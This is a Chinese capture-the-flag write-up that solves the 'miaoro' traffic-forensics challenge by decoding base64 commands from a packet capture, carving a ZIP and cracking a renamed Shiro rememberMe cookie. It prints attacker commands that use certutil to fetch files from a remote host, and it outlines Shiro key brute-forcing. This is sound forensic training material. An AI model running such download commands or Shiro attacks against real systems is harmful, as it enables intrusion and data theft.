[羊城杯 2024]miaoro

题目描述：

下载附件，解压之后得到miaoro.pcapng，用NetA分析一下：

没找到关键词flag，用wireshark打开，http contains "flag"也是一片空白，应该是被加密了，只能手动查找相关信息了

追踪tcp流，发现了“GWHT”字段，而且在流10中发现了base64编码：

解密结果：

echo Th15_11111111s_pP@sssssw000rd!!!>pass.txt

Th15_11111111s_pP@sssssw000rd!!!看上去像是个密码

之后不断从流11、12、13、...的顺序下去进行base64解码：

流11：

Y2VydHV0aWwgLXVybGNhY2hlIC1mICJodHRwOi8vMTkyLjE2OC4xLjM6ODAxL3Rlc3QudHh0Ig==

certutil -urlcache -f "http://192.168.1.3:801/test.txt"

流12：

aXBjb25maWc=

ipconfig

流13：

Y2VydHV0aWwgLXVybGNhY2hlIC1mICJodHRwOi8vMTkyLjE2OC4xLjM6ODAxL3NlY3JldC50eHQi

certutil -urlcache -f "http://192.168.1.3:801/secret.txt"

此时，出现了“secret.txt”字段，且是通过http链接进行下载的，再追踪流13的http流的回应报文：

（注意：直接追踪tcp流的这部分的base64编码数据会有缺陷，所以得追踪http流，很多WP都是放了tcp流的截图上去，然后就继续做下去了，实际上是没法复现成功的）

追踪http流的时候可能会未响应或者闪退，重新追踪即可：

再去base64解码：

发现右侧数据是经典的十六进制数据而且是出现关键字段“4030b405”，压缩包zip的是“504b0304”，刚好反过来了，保存为1.txt文件

解码看到“PK”字段的头还有“flag2.jpg”字段，保存为.zip文件：

（“PK”是zip的头）

填写先前得到的解压密码，解压得到flag2.jpg：

接下来就是修改图片宽高：

Alt+4查看模版结果，改成同宽高即可：

得到小猫图片：

百度识图查找相关信息：

对比该小猫字母图得到flag2：

EBOFDELQDIAA}

在追踪到tcp流6的时候发现cookie值有个“nekoMiao=”的参数：

经了解，出题人对Shiro名以及框架里常见的变量名进行了修改

（shiro->miaoro、rememberMe->nekoMiao、deleteMe->nikoMiao）

也就是说，nekoMiao实际上就是变量rememberMe

那接下来就是爆破Shiro了，可以用蓝队工具箱的“Shiro模块”进行爆破：

但流6的cookie值没法爆破出来，换成流7的cookie值倒是成功爆破出来：

得到flag1：

DASCTF{B916CFEB-C40F-45D6-A7BC-

当然也可以用Shiro rememberMe在线解密得出flag1：

（https://potato.gold/navbar/tool/shiro/ShiroTool.html）

拼接flag：

DASCTF{B916CFEB-C40F-45D6-A7BC-EBOFDELQDIAA}